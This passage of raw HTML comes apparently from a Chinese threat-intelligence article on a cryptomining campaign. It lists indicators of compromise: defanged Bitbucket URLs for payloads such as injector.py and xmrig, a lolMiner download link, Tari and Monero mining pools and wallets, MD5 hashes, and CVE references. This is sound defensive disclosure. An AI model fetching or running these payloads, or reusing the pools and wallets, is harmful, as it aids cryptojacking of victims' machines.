0px;margin-bottom: 8px;margin-top: 8px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;&#34;,&#34;mpa-font-style&#34;:&#34;mmvum0fp1y3s&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;&#34;,&#34;mpa-font-style&#34;:&#34;mmvum0fps6a&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">[.]</span></span></span><span leaf="">org/kalost/installer/raw/main/injector.py</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fpawg"><span leaf=""><a href="http://bitbucket" target="_blank">http://bitbucket</a></span><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fp1y3s"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fps6a"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;&#34;,&#34;mpa-font-style&#34;:&#34;mmvum0fp1y3s&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;&#34;,&#34;mpa-font-style&#34;:&#34;mmvum0fps6a&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">[.]</span></span></span><span leaf="">org/kalost/installer/raw/main/miner_manager.py</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fpn7v"><span leaf=""><a href="http://bitbucket" target="_blank">http://bitbucket</a></span><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fp1y3s"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fps6a"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;&#34;,&#34;mpa-font-style&#34;:&#34;mmvum0fp1y3s&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;&#34;,&#34;mpa-font-style&#34;:&#34;mmvum0fps6a&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">[.]</span></span></span><span leaf="">org/kalost/installer/raw/main/session_utils.py</span></span><o:page></o:page></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fp74p"><span leaf=""><a href="http://bitbucket" target="_blank">http://bitbucket</a></span><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fp1y3s"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fps6a"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;&#34;,&#34;mpa-font-style&#34;:&#34;mmvum0fp1y3s&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;&#34;,&#34;mpa-font-style&#34;:&#34;mmvum0fps6a&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">[.]</span></span></span><span leaf="">org/kalost/installer/raw/main/watch_dog</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fp12it"><span leaf=""><a href="http://bitbucket" target="_blank">http://bitbucket</a></span><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fp1y3s"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fps6a"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;&#34;,&#34;mpa-font-style&#34;:&#34;mmvum0fp1y3s&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;&#34;,&#34;mpa-font-style&#34;:&#34;mmvum0fps6a&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">[.]</span></span></span><span leaf="">org/kalost/installer/raw/main/xmrig</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;"><a href="https://github[.]com/Lolliedieb/lolMiner-releases/releases/download/1.98a/lolMiner_v1.98a_Lin64.tar.gz" target="_blank">https://github[.]com/Lolliedieb/lolMiner-releases/releases/download/1.98a/lolMiner_v1.98a_Lin64.tar.gz</a></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 16px;margin-top: 16px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;font-weight: bold;" mpa-font-style="mmvum0fp11k2"><span leaf="">矿池&amp;钱包地址:</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;word-break: break-all;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fpwes"><span leaf="">GPU挖矿-Tari (XTM)币</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;word-break: break-all;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fp3t4"><span leaf="">矿池: xtm-c29.kryptex[.]network:7040</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;word-break: break-all;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fprtc"><span leaf="">钱包地址: t.log[.]krxXVMD2Z7</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;word-break: break-all;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fp1g8s"><span leaf="">CPU挖矿-门罗币</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;word-break: break-all;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fpljm"><span leaf="">矿池: xmr.kryptex[.]network:7029</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;word-break: break-all;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" mpa-font-style="mmvum0fp1yyl"><span leaf="">钱包地址: x[.]log/885VUf2YL1WDTQZm36tSZU7NqZaSFNSvWH96431L1y5K3cde8sUEQZEQpbxS8JKW7Y6xc8DDEW1xpGWYyAngqG3F8RJtCX5</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 16px;margin-top: 16px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;font-weight: bold;" mpa-font-style="mmvum0fp1clp"><span leaf="">MD5:</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" lang="EN-US" mpa-font-style="mmvum0fp239c"><span leaf="">11f73b3e06cc4cbbdb0afc43ab81d9e6</span><span leaf="">init[.]py</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" lang="EN-US" mpa-font-style="mmvum0fpqny"><span leaf="">136b3c2d11cf6451393dd086e8477832</span><span leaf="">ocean[.]sh</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" lang="EN-US" mpa-font-style="mmvum0fp20da"><span leaf="">17bae42136fdd3a8806a85b514cd8eef</span><span leaf="">watch_dog</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" lang="EN-US" mpa-font-style="mmvum0fp1nba"><span leaf="">2b389760bc4962cc96cd39313411a75e</span><span leaf="">watch_dog</span></span><o:page></o:page></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" lang="EN-US" mpa-font-style="mmvum0fp1m86"><span leaf="">5d73e81a194aa182e643227c35e5befc</span><span leaf="">trex[.]sh</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" lang="EN-US" mpa-font-style="mmvum0fp1u83"><span leaf="">6f8c0d3cc117556bdac86570a006cc25</span><span leaf="">session_utils[.]py</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" lang="EN-US" mpa-font-style="mmvum0fp1czj"><span leaf="">7b202bea09d498a37c611fb0adeaf460</span><span leaf="">script[.]py</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" lang="EN-US" mpa-font-style="mmvum0fp12z9"><span leaf="">80af4fa2a98c7e5d57aa76f58730e660</span><span leaf="">watch_dog_26[.]cpp</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" lang="EN-US" mpa-font-style="mmvum0fpodk"><span leaf="">a2c944e7f074caa90c316032472a6a00</span><span leaf="">miner_manager[.]py</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" lang="EN-US" mpa-font-style="mmvum0fp1txr"><span leaf="">b37d7a21177d039df2001c998a3e4a71</span><span leaf="">injector[.]py</span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" lang="EN-US" mpa-font-style="mmvum0fp1tu2"><span leaf="">cf127d66124c390ca0f0b42c6385c3c8</span><span leaf="">xmrig </span></span></p><p style="text-align: left;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span style="font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;" lang="EN-US" mpa-font-style="mmvum0fpcbs"><span leaf="">cabc624c1076f3dda4e56a6b44166e92</span><span leaf="">lolMiner_v1.98a_Lin64[.]tar.gz</span></span></p><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div data-role="title" data-tools="135编辑器" data-id="85638" style=""><div style="margin: 2em auto 0px;padding: 0.5em 0px;white-space: normal;border-right: none;border-bottom: none;border-left: none;border-image: initial;border-top: 1px solid rgb(204, 204, 204);display: block;font-size: 15px;font-style: normal;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);box-sizing: border-box;font-family:inherit;"><p style="margin-top: -1.2em;text-align: center;padding: 0px;border: none;line-height: 1.4;box-sizing: border-box;"><span style="font-size:15px;"><strong><span style="background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);font-style: normal;padding: 8px 23px;text-align: center;text-decoration: inherit;font-family:inherit;"><span leaf="">参考链接</span></span></strong></span></p></div></div></div><p style="text-align: justify;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;word-break: break-all;margin-bottom: 8px;margin-top: 8px;"><span mpa-font-style="mmvum0fp1j55" data-mpa-action-id="mmvumif01atm" data-pm-slice="0 0 []"><span style="font-variant: normal;text-transform: none;font-size: 15px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" leaf="" mpa-font-style="mmvut763alr">1. <a href="https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2026-22777" target="_blank">https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2026-22777</a></span></span></p><p style="text-align: justify;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;word-break: break-all;margin-bottom: 8px;margin-top: 8px;"><span mpa-font-style="mmvut7631735" style="font-size: 15px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="font-variant: normal;text-transform: none;">2. </span><span leaf="" style="font-variant: normal;text-transform: none;"><a href="https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2025-67303" target="_blank">https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2025-67303</a></span></span></p><p style="text-align: justify;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 0px;word-break: break-all;margin-bottom: 8px;margin-top: 8px;"><span mpa-font-style="mmvut7631kdc" data-mpa-action-id="mmvummjdo51" data-pm-slice="0 0 []" style="font-size: 15px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="font-variant: normal;text-transform: 